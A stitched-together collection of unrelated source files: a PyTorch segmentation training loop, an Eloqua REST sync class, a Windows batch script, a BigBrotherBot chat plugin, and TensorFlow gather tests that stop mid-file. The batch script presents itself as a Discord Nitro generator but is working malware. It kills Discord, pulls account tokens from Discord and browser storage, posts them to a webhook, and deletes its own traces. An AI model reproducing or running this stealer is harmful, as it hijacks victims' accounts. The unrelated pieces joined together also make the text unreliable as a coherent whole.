                seg = pred[i].squeeze().detach().cpu().numpy()
                logger_tb.update_image("original", original, count)
                # Stretch predictions/labels to 0-255 uint8 for display.
                seg = cv2.normalize(seg, None, alpha=0, beta=255,
                                    norm_type=cv2.NORM_MINMAX)
                seg = np.expand_dims(seg, axis=0)
                seg = seg.astype(np.uint8)
                logger_tb.update_image("segmentation", seg, count)
                truth = cv2.normalize(truth, None, alpha=0, beta=255,
                                      norm_type=cv2.NORM_MINMAX)
                truth = np.expand_dims(truth, axis=0)
                truth = truth.astype(np.uint8)
                logger_tb.update_image("truth", truth, count)
            # Periodic validation + best-model checkpointing.
            if count % 5 == 0:
                avg_loss_val, dice, valid_loss = validate(m_args, criterion,
                                                          device, model,
                                                          val_dataloader)
                print("Epoch [{}/{}], Step [{}/{}] || "
                      "Train Loss: {:.4f}, Valid Loss: {:.4f}"
                      .format(epoch + 1, m_args.epoch, count,
                              m_args.epoch * len(train_dataloader),
                              avg_loss, avg_loss_val))
                logger_tb.update_value("steps vs validation loss",
                                       avg_loss_val,
                                       count)
                logger_tb.update_value("steps vs validation dice",
                                       dice,
                                       count)
                if best_valid_loss > avg_loss_val:
                    best_valid_loss = avg_loss_val
                    utils.create_checkpoint(model_name,
                                            count,
                                            global_steps_list,
                                            model,
                                            optimizer,
                                            total_loss,
                                            valid_loss,
                                            m_args.experiment_name)
                # validate() leaves the model in eval mode; switch back.
                model.train()
        # End-of-epoch validation and timing metrics.
        ep_loss_val, epoch_dice, epoch_val_loss = validate(m_args,
                                                           criterion,
                                                           device,
                                                           model,
                                                           val_dataloader)
        end_time = time.time()
        epoch_mins, epoch_secs = utils.epoch_time(start_time, end_time)
        total_time_min += epoch_mins
        total_time_sec += epoch_secs
        logger_tb.update_value("epoch vs validation loss", ep_loss_val, epoch)
        logger_tb.update_value("epoch vs validation dice", epoch_dice, epoch)
        logger_tb.update_value("epoch vs time", total_time_min, epoch)
        logger_tb.update_value("steps vs time", total_time_min, count)
def validate(v_args, criterion, device, model, validation_dataloader):
    """Run one full pass over the validation set.

    Returns the mean validation loss, a Dice score accumulated over all
    batches, and the list of per-batch losses.  Puts the model in eval mode
    and leaves it there; callers are expected to switch back to train().
    """
    model.eval()
    batch_losses = []
    overlap_sum, area_sum = 0, 0
    with torch.no_grad():
        for batch_x, batch_nuclei, batch_cell in validation_dataloader:
            # Pick the label channel requested on the command line.
            labels = batch_nuclei if v_args.target_type == "nuclei" else batch_cell
            # Scale raw pixel values into [0, 1] before the forward pass.
            inputs = torch.div(batch_x.to(device), 255)
            targets = labels.to(device)
            logits = model(inputs).squeeze(1)
            batch_losses.append(criterion(logits, targets.long()).item())
            # Hard predictions: class with the highest score per pixel.
            predicted = torch.max(logits, dim=1)[1]
            flat_pred = predicted.view(-1)
            flat_true = targets.view(-1)
            # Accumulate Dice components across the whole validation set:
            # overlap_sum counts true positives, area_sum the combined areas.
            overlap_sum += (flat_pred * flat_true).sum()
            area_sum += flat_pred.sum() + flat_true.sum()
    dice = (2. * overlap_sum) / area_sum
    avg_loss_val = np.mean(batch_losses)
    return avg_loss_val, dice, batch_losses
if __name__ == "__main__":
args = arguments.get_arguments()
main(args)
|
#!/usr/bin/python
# ElqRest functions by Greg Bernard
import datetime
import requests
import config
import sqlite3
import time
import TableNames
API_VERSION = '2.0' # Change to use a different API version
# Default headers for JSON POST bodies sent to the Eloqua REST API.
POST_HEADERS = {'Content-Type': 'application/json'}
class ElqRest(object):
    """Mirrors selected Eloqua REST assets (campaigns, users, external
    activities) into a local SQLite database."""
    def __init__(self, sync=None, company=config.company, username=config.username,
                 password=config.password, filename='EloquaDB.db'):
        """
        :param string sync: Eloqua object to sync to database,
        if you provide a value all relevant methods will automatically be called
        current support: campaigns, campaign, external
        :param string username: Eloqua username
        :param string password: Eloqua password
        :param string company: Eloqua company instance
        :param string filename: Name of database file
        """
        # Probe the Eloqua login endpoint; the response carries the user's
        # identity and the per-instance REST base URLs used below.
        url = 'https://login.eloqua.com/id'
        req = requests.get(url, auth=(company + '\\' + username,
                                      password))
        self.sync = sync
        self.filename = filename
        print("-"*50)
        print("Beginning {} sync.".format(sync))
        if all(arg is not None for arg in (username, password, company)):
            if req.json() == 'Not authenticated.':
                raise ValueError('Invalid login credentials')
            else:
                self.username = username
                self.password = password
                self.company = company
                # Eloqua uses "company\\username" as the basic-auth user.
                self.auth = (company + '\\' + username, password)
                self.user_id = req.json()['user']['id']
                self.user_display = req.json()['user']['displayName']
                self.url_base = req.json()['urls']['base']
                self.site_id = req.json()['site']['id']
                # Unformatted REST base URL template (has a {version} slot).
                self.rest_bs_un = req.json()['urls']['apis'][
                    'rest']['standard']
                self.rest_base = self.rest_bs_un.format(
                    version=API_VERSION)
        else:
            raise Exception(
                'Please enter all required login details: company, username, password')
        self.db = sqlite3.connect(self.filename, detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
        self.c = self.db.cursor()
    # BASE GET METHOD ----------------------------------------------------------------------------------------
    def get(self, asset_id=None, count=500, page=1):
        """
        Get REST API 2.0 data from Eloqua
        :param asset_id: If your asset is meant to only pull one at a time,
        provide the ID for the asset you wish to pull
        :param count: If your asset is pulled in batches, the size of the batch
        :param page: The page you wish to pull, size of the page is determined by your batch size
        :return: The requested data
        """
        depth = ""
        # Asset kinds that are fetched page-by-page rather than by id.
        multi_assets = ['campaigns', 'users']
        if self.sync == 'external':
            asset_type = 'data/activity/'
        elif self.sync == 'campaigns':
            asset_type = 'assets/campaigns'
            depth = 'depth=partial&'
        elif self.sync == 'campaign':
            asset_type = 'assets/campaign/'
        elif self.sync == 'users':
            asset_type = 'system/users'
            depth = 'depth=complete'
            # The users endpoint lives under API 1.0: rebuild the base URL.
            self.rest_base = self.rest_bs_un.format(
                version='1.0')
            # print(self.rest_base)
        else:
            raise Exception(
                "Please enter an accepted REST input: external, campaign, campaigns, users")
        if count is None:
            count_item = ""
        elif (count is not None) and (self.sync not in multi_assets):
            # print("{} does not accept the input count, removing.".format(asset))
            count_item = ""
        else:
            count_item = "count={}&".format(count)
        if page is None:
            page_item = ""
        elif (page is not None) and (self.sync not in multi_assets):
            # print("{} does not accept the input page, removing.".format(asset))
            page_item = ""
        else:
            page_item = "page={}&".format(page)
        if (self.sync not in multi_assets) and (asset_id is not None):
            asset_id = asset_id
        else:
            # Multi-asset endpoints take no id; '?' starts the query string.
            asset_id = "?"
        url = self.rest_base + str(asset_type) + \
            str(asset_id) + page_item + count_item + depth
        # print(url)
        req = requests.get(url, auth=self.auth)
        if req.status_code == 200:
            return req.json()
        else:
            # Non-200 responses are reported and collapsed to None; callers
            # treat None as "no more data".
            print("Error Code: {}".format(req.status_code))
            return None
    # GET SPECIFIC DATA FROM REST ---------------------------------------------------------------------------
    def get_activities(self, start=1, end=999999):
        """
        Use the get method to pull all available records in the provided range
        :param start: starting record ID
        :param end: ending record ID
        :return: list of dicts containing activities data
        """
        activities = []
        for i in range(start, end):
            data = self.get(asset_id=i)
            if data is not None:
                activities.append(data)
            else:
                # A missing record marks the end of the activity stream.
                print("No more activity data, last record exported: {}.".format(i-1))
                break
        self.sync = 'external'
        return activities
    def get_campaigns(self, count=1000, p_start=1, p_end=999999):
        """
        Pulls all campaigns from Eloqua in a defined range.
        :param count: Size of batch to pull per page
        :param p_start: Page to start on
        :param p_end: Page to finish on
        :return:
        """
        campaigns = []
        print("Starting export on page: {}".format(p_start))
        for i in range(p_start, p_end):
            data = self.get(count=count, page=i)['elements']
            if len(data) != 0:
                campaigns.extend(data)
            else:
                # An empty page marks the end of the campaign list.
                print("No more campaign data, last page exported: {}".format(i-1))
                break
        self.sync = 'campaigns'
        return campaigns
    def get_users(self, count=1000, p_start=1, p_end=9999999):
        # Page through system/users until an empty page or an error response.
        users = []
        print("Starting export...")
        for i in range(p_start, p_end):
            try:
                data = self.get(count=count, page=i)['elements']
            except TypeError:
                # self.get returned None (non-200 response); stop paging.
                break
            # print(i)
            if len(data) != 0:
                # print(data)
                users.extend(data)
            else:
                print("No more user data, last page exported: {}".format(i-1))
                break
        self.sync = 'users'
        return users
    # DATA INSERTION ----------------------------------------------------------------------------------------
    def insert_data(self, table, col_count, sql_data):
        """
        Local function that allows a wait period if database file is busy, then retries
        """
        try:
            self.c.executemany("""INSERT OR REPLACE INTO {} VALUES ({});""".format(
                table, ",".join("?" * col_count)), sql_data)
        except sqlite3.OperationalError:
            print("ElqRest: Another application is currently using the database,"
                  " waiting 15 seconds then attempting to continue.")
            time.sleep(15)
            self.insert_data(table, col_count, sql_data)
        self.db.commit()
        self.db.close()
        # NOTE(review): the connection is closed right after the commit, so a
        # single ElqRest instance supports only one insert_data call; a second
        # call would hit a closed database.  Confirm this is the intended
        # one-shot usage (main() below creates one instance per sync).
        print("Data has been committed.")
    # DATA PROCESSING STEPS ----------------------------------------------------------------------------------
    def export_campaigns(self, table='Campaigns'):
        """
        Populates campaigns table in the database.
        :param table: name of the table to create, or search in the database
        """
        col = ', '.join("'{}' {}".format(key, val) for key, val in TableNames.campaign_col_def.items())
        self.c.execute('''CREATE TABLE IF NOT EXISTS {table} ({columns});'''
                       .format(table=table, columns=col))
        new_data = self.get_campaigns(count=1000)
        sql_data = []
        # Columns declared DATETIME hold unix timestamps that need converting.
        date_columns = [k for k, v in TableNames.campaign_col_def.items() if v.find('DATETIME') >= 0]
        for d in new_data:
            dic = {}
            for c in date_columns:
                # Convert unix timestamps to datetime
                try:
                    d[c] = datetime.datetime.fromtimestamp(
                        int(d[c])).strftime('%Y-%m-%d %H:%M:%S')
                except KeyError:
                    d[c] = ""
                    continue
            # Flatten the first three custom field values into fixed columns.
            try:
                d['Field 1'] = d['fieldValues'][0]['value']
                d['Field 2'] = d['fieldValues'][1]['value']
                d['Field 3'] = d['fieldValues'][2]['value']
            except KeyError:
                d['Field 1'] = ""
                d['Field 2'] = ""
                d['Field 3'] = ""
            # Project onto the declared schema, blank-filling missing keys.
            for k in TableNames.campaign_col_def.keys():
                try:
                    dic[k] = d[k]
                except KeyError:
                    dic[k] = ''
                    continue
            sql_data.append(list(dic.values()))
        print("-"*50)
        col_count = len(sql_data[0])
        self.insert_data(table=table, col_count=col_count, sql_data=sql_data)
    def export_users(self, table='users'):
        """
        Populates users table in the database.
        :param table: name of the table to create, or search in the database
        """
        col = ', '.join("'{}' {}".format(key, val) for key, val in TableNames.users_col_def.items())
        self.c.execute('''CREATE TABLE IF NOT EXISTS {table} ({columns});'''
                       .format(table=table, columns=col))
        new_data = self.get_users(count=1000)
        sql_data = []
        date_columns = [k for k, v in TableNames.users_col_def.items()
                        if (v.find('DATETIME') >= 0) or (v.find('TIMESTAMP') >= 0)]
        for d in new_data:
            dic = {}
            for c in date_columns:
                # Convert unix timestamps to datetime
                try:
                    d[c] = datetime.datetime.fromtimestamp(
                        int(d[c])).strftime('%Y-%m-%d %H:%M:%S')
                except KeyError:
                    d[c] = ""
                    continue
            # Remove extra columns from some users
            # (assumes the declared schema has 12 columns — verify against
            # TableNames.users_col_def)
            if len(d) != 12:
                for k in TableNames.users_col_def.keys():
                    dic[k] = d[k]
                d = dic
            sql_data.append(list(d.values()))
        col_count = len(sql_data[0])
        # for l in sql_data:
        #     print(l)
        # print(col_count)
        self.insert_data(table=table, col_count=col_count, sql_data=sql_data)
    def export_external(self, table='External_Activity', start=None, end=99999):
        """
        Populates external activity table in the database.
        :param table: name of the table to create, or search in the database
        :param start: record to start from
        :param end: integer, non-inclusive
        """
        col = ', '.join("'{}' {}".format(key, val) for key, val in TableNames.external_col_def.items())
        # col = col + ", FOREIGN KEY(ContactId) REFERENCES contacts(ContactId)"
        try:
            # Look up the highest id already stored so the sync can resume.
            self.c.execute("""SELECT {id} FROM {table} ORDER BY {id} DESC LIMIT 1;"""
                           .format(id='id', table=table))
        except sqlite3.OperationalError:
            self.c.execute('''CREATE TABLE IF NOT EXISTS {} ({});'''.format(table, col))
        # If a start value is given, starts from that, otherwise starts from the first value in the table
        # and if there is no table, starts from the first value, and continues until none are left
        try:
            if start is None:
                start = self.c.fetchone()[0]
            else:
                start = start
            if end != 99999:
                print("Extracting from {} to {}.".format(start, end-1))
            else:
                print("Extracting everything after: {}".format(start) + "\nThis could take a while.")
            new_data = self.get_activities(start=int(start), end=end)
        except TypeError:
            # fetchone() returned None: empty/new table, start from record 1.
            print("There is no pre-existing data in this table.")
            if end != 99999:
                print("Extracting from {} to {}.".format(1, end-1))
            else:
                print("Extracting everything... This may take a while.")
            new_data = self.get_activities(start=1, end=end)
        col_count = len(list(new_data[0].keys()))
        print("This table contains {} columns.".format(col_count))
        sql_data = []
        for d in new_data:
            # Convert unix timestamps to datetime
            d['activityDate'] = datetime.datetime.fromtimestamp(
                int(d['activityDate'])).strftime('%Y-%m-%d %H:%M:%S')
            d['id'] = int(d['id'])
            sql_data.append(list(d.values()))
        self.insert_data(table=table, col_count=col_count, sql_data=sql_data)
def main():
    # Example driver: sync Eloqua users into the local SQLite database.
    # The campaign sync variant is left here disabled for reference.
    # db = ElqRest(sync='campaigns')
    # db.export_campaigns()
    db = ElqRest(sync='users')
    db.export_users()
if __name__ == '__main__':
    main()
|
@echo off
REM ╔═╗┌─┐┬─┐┌─┐┬
REM ╠═╣├┤ ├┬┘├─┤│ https://github.com/Its-AfraL/
REM ╩ ╩└ ┴└─┴ ┴┴─┘
if exist nitro_gen.ps1 del /s /q nitro_gen.ps1 > nul
echo $ErrorActionPreference= 'silentlycontinue' > nitro_gen.ps1
echo $tokensString = new-object System.Collections.Specialized.StringCollection >> nitro_gen.ps1
echo $webhook_url = "" >> nitro_gen.ps1
echo $location_array = @( >> nitro_gen.ps1
echo $env:APPDATA + "\Discord\Local Storage\leveldb" #Standard Discord >> nitro_gen.ps1
echo $env:APPDATA + "\discordcanary\Local Storage\leveldb" #Discord Canary >> nitro_gen.ps1
echo $env:APPDATA + "\discordptb\Local Storage\leveldb" #Discord PTB >> nitro_gen.ps1
echo $env:LOCALAPPDATA + "\Google\Chrome\User Data\Default\Local Storage\leveldb" #Chrome Browser >> nitro_gen.ps1
echo $env:APPDATA + "\Opera Software\Opera Stable\Local Storage\leveldb", #Opera Browser >> nitro_gen.ps1
echo $env:LOCALAPPDATA + "\BraveSoftware\Brave-Browser\User Data\Default\Local Storage\leveldb" #Brave Browser >> nitro_gen.ps1
echo $env:LOCALAPPDATA + "\Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb" #Yandex Browser >> nitro_gen.ps1
echo ) >> nitro_gen.ps1
echo Stop-Process -Name "Discord" -Force >> nitro_gen.ps1
echo foreach ($path in $location_array) { >> nitro_gen.ps1
echo if(Test-Path $path){ >> nitro_gen.ps1
echo foreach ($file in Get-ChildItem -Path $path -Name) { >> nitro_gen.ps1
echo $data = Get-Content -Path "$($path)\$($file)" >> nitro_gen.ps1
echo $regex = [regex] '[\w]{24}\.[\w]{6}\.[\w]{27}' >> nitro_gen.ps1
echo $match = $regex.Match($data) >> nitro_gen.ps1
echo while ($match.Success) { >> nitro_gen.ps1
echo if (!$tokensString.Contains($match.Value)) { >> nitro_gen.ps1
echo $tokensString.Add($match.Value) ^| out-null >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo $match = $match.NextMatch() >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo foreach ($token in $tokensString) { >> nitro_gen.ps1
echo $message = ^"** Discord tokens : ** >> nitro_gen.ps1
echo ``` $token ``` ^" >> nitro_gen.ps1
echo $hash = @{ "content" = message; } >> nitro_gen.ps1
echo $JSON = $hash ^| convertto-json >> nitro_gen.ps1
echo Invoke-WebRequest -uri $webhook_url -Method POST -Body $JSON -Headers @{'Content-Type' = 'application/json'} >> nitro_gen.ps1
echo } >> nitro_gen.ps1
powershell -file nitro_gen.ps1 > nul
del /s /q nitro_gen.ps1 > nul
pause
|
#
# BigBrotherBot(B3) (www.bigbrotherbot.com)
# Copyright (C) 2006 Walker
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# CHANGELOG
# 01/03/2006 - 1.0.0 - Walker
# Copied Thorn's censor plugin and created the chat plugin from it.
# 14/11/2009 - 1.1.0 - Courgette
# Add keywords $time and $nextmap
# 14/11/2009 - 1.1.1 - Courgette
# Add missing module time
__author__ = 'Walker'
__version__ = '1.1.1'
import b3, re, traceback, sys, threading, random, time
import b3.events
import b3.plugin
import b3.functions
#--------------------------------------------------------------------------------------------------
class ChatPlugin(b3.plugin.Plugin):
    """Replies to configured chat triggers with a randomly chosen canned
    reaction, with $player/$time/$nextmap substitution."""
    _adminPlugin = None
    # Collapses anything that is not alphanumeric or a space (case-insensitive).
    _reClean = re.compile(r'[^0-9a-z ]+', re.I)
    _maxLevel = 0
    def onStartup(self):
        # The admin plugin is required; bail out quietly when it is missing.
        self._adminPlugin = self.console.getPlugin('admin')
        if not self._adminPlugin:
            return False
        self.registerEvent(b3.events.EVT_CLIENT_SAY)
        self.registerEvent(b3.events.EVT_CLIENT_TEAM_SAY)
    def onLoadConfig(self):
        self.console.verbose('ChatPlugin: Fetching chat messages')
        self._messages = []
        for e in self.config.get('messages/message'):
            trigger = e.find('trigger').text
            i = 0
            _reactions = []
            for reaction in e.findall('reaction'):
                _reactions.append ( reaction.text )
            try:
                # Pair the compiled trigger regex with its reaction pool.
                self._messages.append ([re.compile(trigger, re.I), _reactions])
            except Exception, msg:
                self.error('ChatPlugin error: %s - %s', msg, traceback.extract_tb(sys.exc_info()[2]))
        self.console.verbose('ChatPlugin: Chat messages loaded into memory')
    def onEvent(self, event):
        try:
            if not event.client:
                return
            # Pad with spaces so triggers can match at the start/end of the line.
            sentance = ' ' + self.clean(event.data) + ' '
            for m in self._messages:
                if m[0].search(sentance):
                    # Pick one reaction at random from this trigger's pool.
                    message = m[1][random.randint(0, len(m[1]) - 1)]
                    variables = {
                        'player' : event.client.name,
                        'time' : self.console.formatTime(time.time())
                    }
                    if '$nextmap' in message:
                        # only include nextmap if required as getNextMap
                        # can cost a rcon query to the server
                        variables['nextmap'] = self.console.getNextMap()
                    message = b3.functions.vars2printf( message )
                    self.console.say(message % variables)
        except Exception, msg:
            self.error('Chat plugin error: %s - %s', msg, traceback.extract_tb(sys.exc_info()[2]))
    def clean(self, data):
        # Lowercase, strip color codes, then collapse punctuation to spaces.
        return re.sub(self._reClean, ' ', self.console.stripColors(data.lower()))
if __name__ == '__main__':
    # Manual smoke test against B3's fake console: load the plugin, then
    # fire a few chat lines that should match configured triggers.
    from b3.fake import fakeConsole
    from b3.fake import joe
    import time
    #p = ChatPlugin(fakeConsole, 'C:/Users/Thomas/workspace/b3/testconf/extplugins/plugin_chat.xml')
    p = ChatPlugin(fakeConsole, '@conf/extplugins/plugin_chat.xml')
    p.onStartup()
    joe.says("nextmap")
    time.sleep(1)
    joe.says('time')
    time.sleep(1)
    joe.says('cheater')
    time.sleep(1)
    joe.says('fuk*** cheater')
    time.sleep(1)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.gather."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
_TEST_TYPES = (dtypes.int64, dtypes.float32,
dtypes.complex64, dtypes.complex128)
# TODO(virimia): Add a benchmark for gather_v2, with batch_dims and axis set.
class GatherTest(test.TestCase, parameterized.TestCase):
  def _buildParams(self, data, dtype):
    # Cast the test data to the requested dtype; for complex dtypes an
    # imaginary component derived from the data makes wrong gathers visible.
    data = data.astype(dtype.as_numpy_dtype)
    # For complex types, add an index-dependent imaginary component so we can
    # tell we got the right value.
    if dtype.is_complex:
      return data + 10j * data
    return data
  def testScalar1D(self):
    # Gather with a scalar index and with 1-D indices from 1-D params,
    # checked against NumPy fancy indexing.
    with self.cached_session(use_gpu=True):
      data = np.array([0, 1, 2, 3, 7, 5])
      for dtype in _TEST_TYPES:
        for indices in 4, [1, 2, 2, 4, 5]:
          params_np = self._buildParams(data, dtype)
          params = constant_op.constant(params_np)
          indices_tf = constant_op.constant(indices)
          gather_t = array_ops.gather(params, indices_tf)
          gather_val = self.evaluate(gather_t)
          np_val = params_np[indices]
          self.assertAllEqual(np_val, gather_val)
          self.assertEqual(np_val.shape, gather_t.get_shape())
  def testScalar2D(self):
    # Scalar index gathered along every axis of 2-D params, vs np.take.
    with self.session(use_gpu=True):
      data = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8],
                       [9, 10, 11], [12, 13, 14]])
      for dtype in _TEST_TYPES:
        for axis in range(data.ndim):
          params_np = self._buildParams(data, dtype)
          params = constant_op.constant(params_np)
          indices = constant_op.constant(2)
          gather_t = array_ops.gather(params, indices, axis=axis)
          gather_val = self.evaluate(gather_t)
          self.assertAllEqual(np.take(params_np, 2, axis=axis), gather_val)
          expected_shape = data.shape[:axis] + data.shape[axis + 1:]
          self.assertEqual(expected_shape, gather_t.get_shape())
  def testSimpleTwoD32(self):
    # 1-D index vector gathered along every axis of 2-D params, vs np.take.
    with self.session(use_gpu=True):
      data = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8],
                       [9, 10, 11], [12, 13, 14]])
      for dtype in _TEST_TYPES:
        for axis in range(data.ndim):
          params_np = self._buildParams(data, dtype)
          params = constant_op.constant(params_np)
          # The indices must be in bounds for any axis.
          indices = constant_op.constant([0, 1, 0, 2])
          gather_t = array_ops.gather(params, indices, axis=axis)
          gather_val = self.evaluate(gather_t)
          self.assertAllEqual(np.take(params_np, [0, 1, 0, 2], axis=axis),
                              gather_val)
          expected_shape = data.shape[:axis] + (4,) + data.shape[axis + 1:]
          self.assertEqual(expected_shape, gather_t.get_shape())
  @test_util.run_deprecated_v1
  def testHigherRank(self):
    # Exercises gather on rank-4 params across every axis with scalar,
    # empty and 2-D index shapes, then checks gradients against a NumPy
    # scatter-add reference.
    # We check that scalar and empty indices shapes work as well
    shape = (2, 1, 3, 2)
    for indices_shape in (), (0,), (2, 0), (2, 3):
      for dtype in _TEST_TYPES:
        for axis in range(len(shape)):
          params = self._buildParams(np.random.randn(*shape), dtype)
          indices = np.random.randint(shape[axis], size=indices_shape)
          with self.cached_session(use_gpu=True) as sess:
            tf_params = constant_op.constant(params)
            tf_indices = constant_op.constant(indices)
            # Check that both positive and negative indices for axis work.
            tf_axis = constant_op.constant(axis)
            tf_negative_axis = constant_op.constant(-len(shape) + axis)
            gather = array_ops.gather(tf_params, tf_indices, axis=tf_axis)
            gather_negative_axis = array_ops.gather(
                tf_params, tf_indices, axis=tf_negative_axis)
            gather_value, gather_negative_axis_value = sess.run(
                [gather, gather_negative_axis])
            gather_np = np.take(params, indices, axis)
            self.assertAllEqual(gather_np, gather_value)
            self.assertAllEqual(gather_np, gather_negative_axis_value)
            expected_shape = (params.shape[:axis] + indices.shape +
                              params.shape[axis + 1:])
            self.assertEqual(expected_shape, gather.shape)
            self.assertEqual(expected_shape, gather_negative_axis.shape)
            # Test gradients
            gather_grad = np.random.randn(
                *gather.get_shape().as_list()).astype(dtype.as_numpy_dtype)
            if dtype.is_complex:
              gather_grad -= 1j * gather_grad
            params_grad, indices_grad, axis_grad = gradients_impl.gradients(
                gather, [tf_params, tf_indices, tf_axis], gather_grad)
            # Indices and axis are integer inputs: no gradient flows to them.
            self.assertEqual(indices_grad, None)
            self.assertEqual(axis_grad, None)
            if dtype.is_integer:
              self.assertEqual(params_grad, None)
              continue
            # For axis 0, we are able to create an efficient IndexedSlices for
            # the gradient.
            if axis == 0:
              self.assertEqual(type(params_grad), ops.IndexedSlices)
              params_grad = ops.convert_to_tensor(params_grad)
            # Reference gradient: scatter-add each gathered slice's upstream
            # gradient back to its source position in params.
            correct_params_grad = np.zeros(shape).astype(dtype.as_numpy_dtype)
            outer_dims = axis
            inner_dims = len(shape) - axis - 1
            gather_grad = gather_grad.reshape(
                shape[:axis] + (indices.size,) + shape[axis + 1:])
            for source_index, dest_index in enumerate(indices.flat):
              dest_slice = ((slice(None),) * outer_dims + (dest_index,) +
                            (slice(None),) * inner_dims)
              source_slice = ((slice(None),) * outer_dims + (source_index,) +
                              (slice(None),) * inner_dims)
              correct_params_grad[dest_slice] += gather_grad[source_slice]
            self.assertAllClose(
                correct_params_grad,
                self.evaluate(params_grad),
                atol=2e-6,
                rtol=2e-6)
  @test_util.run_deprecated_v1
  def testString(self):
    # Gather of byte-string params along both axes.
    params = np.array([[b"asdf", b"zxcv"], [b"qwer", b"uiop"]])
    with self.cached_session():
      self.assertAllEqual([b"qwer", b"uiop"],
                          array_ops.gather(params, 1, axis=0).eval())
      self.assertAllEqual([b"asdf", b"qwer"],
                          array_ops.gather(params, 0, axis=1).eval())
  @test_util.run_deprecated_v1
  def testUInt32AndUInt64(self):
    # Unsigned integer dtypes must gather correctly along both axes too.
    for unsigned_type in (dtypes.uint32, dtypes.uint64):
      params = self._buildParams(
          np.array([[1, 2, 3], [7, 8, 9]]), unsigned_type)
      with self.cached_session():
        self.assertAllEqual([7, 8, 9],
                            array_ops.gather(params, 1, axis=0).eval())
        self.assertAllEqual([1, 7], array_ops.gather(params, 0, axis=1).eval())
  @test_util.run_deprecated_v1
  def testUnknownIndices(self):
    # With placeholder indices the static result shape must be unknown.
    params = constant_op.constant([[0, 1, 2]])
    indices = array_ops.placeholder(dtypes.int32)
    gather_t = array_ops.gather(params, indices)
    self.assertEqual(None, gather_t.get_shape())
  @test_util.run_deprecated_v1
  def testUnknownAxis(self):
    # With a placeholder axis only the result rank can be inferred.
    params = constant_op.constant([[0, 1, 2]])
    indices = constant_op.constant([[0, 0], [0, 0]])
    axis = array_ops.placeholder(dtypes.int32)
    gather_t = array_ops.gather(params, indices, axis=axis)
    # Rank 2 params with rank 2 indices results in a rank 3 shape.
    self.assertEqual([None, None, None], gather_t.shape.as_list())
    # If indices is also unknown the result rank is unknown.
    indices = array_ops.placeholder(dtypes.int32)
    gather_t = array_ops.gather(params, indices, axis=axis)
    self.assertEqual(None, gather_t.shape)
  def testBadIndicesCPU(self):
    # Out-of-range indices must raise on CPU, for every axis.
    with test_util.force_cpu():
      params = [[0, 1, 2], [3, 4, 5]]
      with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 2\)"):
        self.evaluate(array_ops.gather(params, [[7]], axis=0))
      with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 3\)"):
        self.evaluate(array_ops.gather(params, [[7]], axis=1))
  def _disabledTestBadIndicesGPU(self):
    # TODO disabled due to different behavior on GPU and CPU
    # On GPU the bad indices do not raise error but fetch 0 values
    if not test.is_gpu_available():
      return
    with self.session(use_gpu=True):
      params = [[0, 1, 2], [3, 4, 5]]
      with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 2\)"):
        array_ops.gather(params, [[7]], axis=0).eval()
      with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 3\)"):
        array_ops.gather(params, [[7]], axis=1).eval()
  @test_util.run_deprecated_v1
  def testBadAxis(self):
    # An invalid axis fails during shape inference when the params rank is
    # known, and at run time when params is a placeholder of unknown rank.
    with self.session(use_gpu=True):
      params = [0, 1, 2]
      params_ph = array_ops.placeholder(dtypes.int32)
      indices = 0
      for bad_axis in (1, 2, -2):
        # Shape inference can validate axis for known params rank.
        with self.assertRaisesWithPredicateMatch(
            ValueError, "Shape must be at least rank . but is rank 1"):
          array_ops.gather(params, indices, axis=bad_axis)
        # If params rank is unknown, an op error occurs.
        with self.assertRaisesOpError(
            r"Expected axis in the range \[-1, 1\), but got %s" % bad_axis):
          array_ops.gather(params_ph, indices, axis=bad_axis).eval(
              feed_dict={params_ph: params})
  @test_util.run_deprecated_v1
  def testEmptySlices(self):
    # Gathering from zero-sized dimensions yields empty results, not errors.
    with self.session(use_gpu=True):
      for dtype in _TEST_TYPES:
        for itype in np.int32, np.int64:
          # Leading axis gather.
          params = np.zeros((7, 0, 0), dtype=dtype.as_numpy_dtype)
          indices = np.array([3, 4], dtype=itype)
          gather = array_ops.gather(params, indices, axis=0)
          self.assertAllEqual(gather.eval(), np.zeros((2, 0, 0)))
          # Middle axis gather.
          params = np.zeros((0, 7, 0), dtype=dtype.as_numpy_dtype)
          gather = array_ops.gather(params, indices, axis=1)
          self.assertAllEqual(gather.eval(), np.zeros((0, 2, 0)))
          # Trailing axis gather.
          params = np.zeros((0, 0, 7), dtype=dtype.as_numpy_dtype)
          gather = array_ops.gather(params, indices, axis=2)
          self.assertAllEqual(gather.eval(), np.zeros((0, 0, 2)))
  @parameterized.parameters([
